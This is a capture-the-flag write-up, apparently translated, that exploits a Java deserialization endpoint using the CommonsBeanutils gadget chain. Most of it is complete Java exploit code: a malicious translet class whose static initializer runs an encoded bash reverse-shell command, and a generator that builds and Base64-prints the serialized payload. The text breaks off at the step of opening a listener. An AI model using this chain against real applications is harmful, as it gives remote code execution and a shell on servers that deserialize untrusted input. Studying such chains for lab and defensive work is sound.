I. Challenge
II. Solution
1. From the jar we can see that the /user route performs a deserialization operation.
The jar also bundles commons-beanutils at version 1.9.2, so the CommonsBeanutils (CB) gadget chain can be used to get a shell.
Write a PoC from the CommonsBeanutils1 chain in ysoserial. Make sure the commons-beanutils version in ysoserial's pom.xml matches the target's (1.9.2): BeanComparator's serialVersionUID differs between the 1.8.x and 1.9.x release lines, and a payload built against the wrong one is rejected by the target's ObjectInputStream with an InvalidClassException before the chain ever runs.
ysoserial project: https://github.com/frohoff/ysoserial
Edit the Evil class (MyExec here) as follows:
package ysoserial.poc;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

// The class must extend AbstractTranslet: TemplatesImpl.defineTransletClasses() only accepts
// a translet whose superclass is AbstractTranslet, and newTransformer() then instantiates it,
// which runs the static initializer below on the target.
public class MyExec extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    static {
        try {
            // Base64 string kept exactly as in the original write-up; it is not valid Base64 as
            // printed, so substitute your own encoded reverse-shell command (see below).
            Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4x5MDAxIDA+JjE=}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
The command can be customized as follows (the braces-and-commas form avoids spaces, which Runtime.exec would otherwise split into separate arguments; the Base64 is the encoding of your reverse-shell one-liner):
Runtime.getRuntime().exec("bash -c {echo,<Base64 of the reverse-shell command>}|{base64,-d}|{bash,-i}");
The payload generator class is as follows:
package ysoserial.poc;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import ysoserial.payloads.util.Reflections;

import java.io.*;
import java.util.Base64;
import java.util.PriorityQueue;

public class PoC {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = getTemplate();

        // Property name stays null until the queue is built, so nothing fires in this JVM.
        // String.CASE_INSENSITIVE_ORDER replaces BeanComparator's default ComparableComparator,
        // which lives in commons-collections; the target then only needs commons-beanutils.
        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

        // Queue with our comparator and two stub elements; the heap operations run now, harmlessly.
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        queue.add("1");
        queue.add("1");

        // Arm the comparator: compare() will call PropertyUtils.getProperty(obj, "outputProperties"),
        // i.e. TemplatesImpl.getOutputProperties() -> newTransformer() -> defineClass of our translet.
        Reflections.setFieldValue(comparator, "property", "outputProperties");

        // Swap the stub elements for the TemplatesImpl; PriorityQueue.readObject() re-heapifies on
        // the target and invokes the comparator on them.
        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = templates;
        queueArray[1] = templates;

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(queue);
        byte[] bytes = byteArrayOutputStream.toByteArray();
        System.out.println(Base64.getEncoder().encodeToString(bytes));

        // Local self-test: uncomment to trigger the chain in this JVM.
        // ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
        // ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
        // objectInputStream.readObject();
    }

    public static TemplatesImpl getTemplate() throws Exception {
        ClassPool classPool = ClassPool.getDefault();
        CtClass clz = classPool.get(MyExec.class.getName());
        TemplatesImpl obj = new TemplatesImpl();
        // _bytecodes holds the translet class; _name must be non-null or getTransletInstance()
        // returns early; _tfactory is dereferenced by defineTransletClasses().
        Reflections.setFieldValue(obj, "_bytecodes", new byte[][]{clz.toBytecode()});
        Reflections.setFieldValue(obj, "_name", "HelloTemplatesImpl");
        Reflections.setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        return obj;
    }
}
3. Exploitation
Listen on a port on the attacker machine: